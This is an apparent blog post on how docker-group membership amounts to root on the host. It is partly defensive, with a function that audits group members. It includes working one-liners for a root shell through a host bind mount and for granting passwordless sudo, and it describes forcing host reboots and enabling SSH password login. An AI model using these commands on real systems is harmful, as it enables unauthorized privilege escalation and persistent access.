Why a blog about hacking with docker

Many companies let their customers see and manage Docker containers by putting them in the docker group. After all, it's very easy to say "just hop onto the php container to do your work".


Because of the way Docker works, the Docker daemon runs as root to manage its containers, and membership of the docker group grants unrestricted access to its control socket. That means anyone in the docker group effectively has root access to the server: they can start a container that bind-mounts the host filesystem and read or write any file on it as root.

Your customer might not know this, but malicious users, who can beg, steal and borrow your customer's SSH credentials, most definitely will.

In this example we end up giving our user sudo rights, but you can achieve practically anything this way, including espionage.
As an actual recent case, I had to modify the SSH configuration to allow PasswordAuthentication and to force the server to reboot.

To force the host to reboot from a container, adding -v /dev:/dev:rw to the docker run command is not enough on its own: the container also needs CAP_SYS_BOOT, which Docker drops by default (kept with --privileged), and it must share the host PID namespace (--pid=host), because a reboot(2) call made from inside the container's own PID namespace only kills the container's init process.
With both in place, typing reboot inside the container issues the reboot(2) syscall to the kernel, and because the container shares the host kernel it is the host that reboots, not just the container.

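What docker-group membership means in practice, as an added example that is my own and not code from the original post. It assumes a group file in /etc/group format (so it can be run against a saved copy as well as the live file), the ubuntu:20.04 image, and the "hacker" user from the setup in the next section; the two `*_cmd` functions print the docker run one-liners a docker-group member can use to get a root shell on the host and to grant themselves sudo, which is the outcome the post describes.

```shell
#!/bin/sh
# Added example (not part of the original post): what docker-group membership buys an attacker.
# Assumptions: group file in /etc/group format, image ubuntu:20.04, user "hacker" from the setup.

# Print the members of the docker group from a group file (default: /etc/group).
# Every member listed here can talk to the root-owned docker daemon, i.e. is effectively root.
docker_group_members() {
    groupfile="${1:-/etc/group}"
    awk -F: '$1 == "docker" {
        n = split($4, m, ",")
        for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
    }' "$groupfile"
}

# Exit 0 if USER is in the docker group of the given group file, 1 otherwise.
is_docker_member() {
    user="$1"; groupfile="${2:-/etc/group}"
    docker_group_members "$groupfile" | grep -qx -- "$user"
}

# The one-liner a docker-group member runs to get a root shell on the host:
# the host root filesystem is bind-mounted at /host and chroot'ed into, so the shell sees
# the real /etc/sudoers, /etc/ssh/sshd_config, /root/.ssh and so on, all writable as root.
host_root_shell_cmd() {
    image="${1:-ubuntu:20.04}"
    printf 'docker run --rm -it -v /:/host %s chroot /host /bin/bash\n' "$image"
}

# The non-interactive variant: give USER passwordless sudo on the host by dropping a
# sudoers.d file through the bind mount (sudo ignores the file unless its mode is 0440).
grant_sudo_cmd() {
    user="$1"; image="${2:-ubuntu:20.04}"
    printf "docker run --rm -v /:/host %s sh -c 'echo \"%s ALL=(ALL) NOPASSWD:ALL\" > /host/etc/sudoers.d/%s && chmod 0440 /host/etc/sudoers.d/%s'\n" \
        "$image" "$user" "$user" "$user"
}

# Audit report for the defender: one line per docker-group member, flagged as effectively root.
audit_docker_group() {
    groupfile="${1:-/etc/group}"
    docker_group_members "$groupfile" | while IFS= read -r u; do
        printf '%s: member of docker group => effectively root on this host\n' "$u"
    done
}
```

Run `audit_docker_group` on a server to see who is effectively root; any account there that you would not give sudo to is a finding. The chroot trick needs no capabilities beyond Docker's defaults, which is why merely restricting --privileged does nothing to contain a docker-group member.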

Let's get our hands dirty with a useful example


1. It begins with a basic setup

In this example, I created a fresh Ubuntu 20.04 Server on Digital Ocean and proceeded with the installation of Docker. I added a user called "hacker" and added it to the docker group.

From there on, I could SSH to the Docker server as expected.


Fresh Digital Ocean Ubuntu